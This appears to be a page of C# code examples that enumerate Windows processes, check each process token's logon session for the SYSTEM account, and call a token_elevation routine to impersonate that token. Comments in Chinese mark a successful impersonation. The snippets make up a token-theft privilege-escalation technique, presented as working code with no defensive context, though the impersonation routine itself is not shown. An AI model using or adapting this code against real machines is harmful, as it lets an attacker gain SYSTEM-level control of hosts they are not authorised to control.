Example #1
0
        public static Boolean EnumerateUserProcesses()
        {
            Boolean rs = false;

            Process[] pids = Process.GetProcesses();
            Console.WriteLine("[*] Examining {0} processes", pids.Length);
            foreach (Process p in pids)
            {
                if (p.ProcessName.ToUpper().Equals("System".ToUpper()))         //跳过进程名为"System"的进程
                {
                    continue;
                }
                IntPtr hProcess = OpenProcess(Flags.PROCESS_QUERY_INFORMATION, true, p.Id);
                if (IntPtr.Zero == hProcess)
                {
                    hProcess = OpenProcess(Flags.PROCESS_QUERY_LIMITED_INFORMATION, true, p.Id); //required for protected processes
                    if (IntPtr.Zero == hProcess)
                    {
                        continue;
                    }
                }
                IntPtr hToken;
                if (!OpenProcessToken(hProcess, Flags.MAXIMUM_ALLOWED, out hToken))
                {
                    continue;
                }
                CloseHandle(hProcess);

                UInt32           dwLength        = 0;
                TOKEN_STATISTICS tokenStatistics = new TOKEN_STATISTICS();
                if (!GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                {
                    if (!GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
                    {
                        continue;
                    }
                }

                String userName = String.Empty;
                if (!GetTokenInformationToUsername(tokenStatistics, ref userName))
                {
                    continue;
                }

                rs = token_elevation(hToken);
                if (rs)
                {
                    Console.WriteLine("模拟成功!PID:" + p.Id);
                    break;
                }
            }
            return(rs);
        }
Example #2
0
        //获取进程的用户是否是SYSTEM
        public static Boolean GetTokenInformationToUsername(TOKEN_STATISTICS tokenStatistics, ref String userName)
        {
            IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(_LUID)));

            Marshal.StructureToPtr(tokenStatistics.AuthenticationId, lpLuid, false);
            if (IntPtr.Zero == lpLuid)
            {
                return(false);
            }

            IntPtr ppLogonSessionData = new IntPtr();

            if (0 != LsaGetLogonSessionData(lpLuid, out ppLogonSessionData))
            {
                return(false);
            }

            if (IntPtr.Zero == ppLogonSessionData)
            {
                return(false);
            }

            SECURITY_LOGON_SESSION_DATA securityLogonSessionData = (SECURITY_LOGON_SESSION_DATA)Marshal.PtrToStructure(ppLogonSessionData, typeof(SECURITY_LOGON_SESSION_DATA));

            if (IntPtr.Zero == securityLogonSessionData.Sid || IntPtr.Zero == securityLogonSessionData.UserName.Buffer || IntPtr.Zero == securityLogonSessionData.LogonDomain.Buffer)
            {
                return(false);
            }
            StringBuilder lpName  = new StringBuilder();
            UInt32        cchName = (UInt32)lpName.Capacity;
            StringBuilder lpReferencedDomainName  = new StringBuilder();
            UInt32        cchReferencedDomainName = (UInt32)lpReferencedDomainName.Capacity;
            SID_NAME_USE  sidNameUse = new SID_NAME_USE();

            LookupAccountSid(String.Empty, securityLogonSessionData.Sid, lpName, ref cchName, lpReferencedDomainName, ref cchReferencedDomainName, out sidNameUse);

            userName = lpName.ToString();
            if (!userName.ToUpper().Equals("System".ToUpper()))
            {
                return(false);
            }
            return(true);
        }
Example #3
0
 public static extern Boolean GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, ref TOKEN_STATISTICS TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength);